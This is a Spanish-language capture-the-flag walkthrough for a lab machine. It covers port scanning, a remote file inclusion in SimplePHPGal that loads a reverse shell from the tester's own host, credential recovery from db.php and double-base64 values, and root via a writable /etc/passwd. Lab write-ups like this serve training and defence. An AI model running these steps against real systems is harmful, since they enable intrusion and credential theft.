# All-ports TCP scan. -A enables OS detection, version detection, script
# scanning and traceroute; --script=vuln selects the vuln script category.
# NOTE(review): --min-rate=10000 with --script-timeout=15 (15 s per script)
# trades accuracy for speed, so open ports or script findings can be missed.
# Treat an empty result from this pass as inconclusive.
nmap -A -p- -oA snookums 192.168.77.58 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Second all-ports TCP pass at default timing: default scripts (-sC),
# version detection (-sV) and OS detection (-O).
# NOTE(review): -oA snookums reuses the basename of the previous scan, so the
# earlier snookums.nmap/.gnmap/.xml files are overwritten. Use a distinct
# basename (or --append-output) to keep both result sets as evidence.
nmap -sC -sV -O -p- -oA snookums 192.168.77.58

# UDP scan of all ports, written to separate snookums-udp.* files.
# A full-range UDP scan is slow; expect a long run time.
nmap -sU -O -p- -oA snookums-udp 192.168.77.58

nikto -h 192.168.77.58:80

Pasted image 20211102105218.png

Pasted image 20211102104301.png

Pasted image 20211102104534.png

whatweb http://192.168.77.58

Pasted image 20211102104641.png

Vemos una galería en http://192.168.77.58

Pasted image 20211102104715.png

searchsploit SimplePHPGal

searchsploit -m 48424

Pasted image 20211102105530.png

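Vamos a http://192.168.77.58/image.php? Como muestra la petición de más abajo, el parámetro img acepta una URL remota y el servidor ejecuta el PHP que incluye (inclusión remota de archivos). La corrección es validar img contra una lista de imágenes permitidas y mantener allow_url_include desactivado en PHP.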

Pasted image 20211102105544.png

python3 -m http.server 80

http://192.168.77.58/image.php?img=http://192.168.49.77/php-reverse-shell.php

nc -lvnp 21

Pasted image 20211102110128.png

cd /var/www/html && cat db.php

Pasted image 20211102110419.png

cat /var/www/html/db.php

mysql -u root -p

Credenciales de MySQL leídas en db.php: root:MalapropDoffUtilize1337

use SimplePHPGal

select * from users

Pasted image 20211102113205.png

echo -n "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" |base64 -d

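Obtenemos otra cadena en base64 y la decodificamos de nuevo. La contraseña estaba guardada con doble codificación base64, que es reversible y no sustituye a un hash de contraseñas.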

Credenciales: michael:HockSydneyCertify123

Pasted image 20211102113342.png

ssh michael@192.168.77.58

Pasted image 20211102113548.png

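Vemos que /etc/passwd se puede sobrescribir con el usuario michael, de modo que una entrada nueva con UID 0 equivale a root. El archivo debería pertenecer a root y tener permisos 644.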

Pasted image 20211102113652.png

openssl passwd -1 hack 123123

echo 'hack:$1$hack$R78Vb02JSSxv5kQZvNiPU.:0:0:root:/bin/bash'

su hack

Pasted image 20211102115804.png
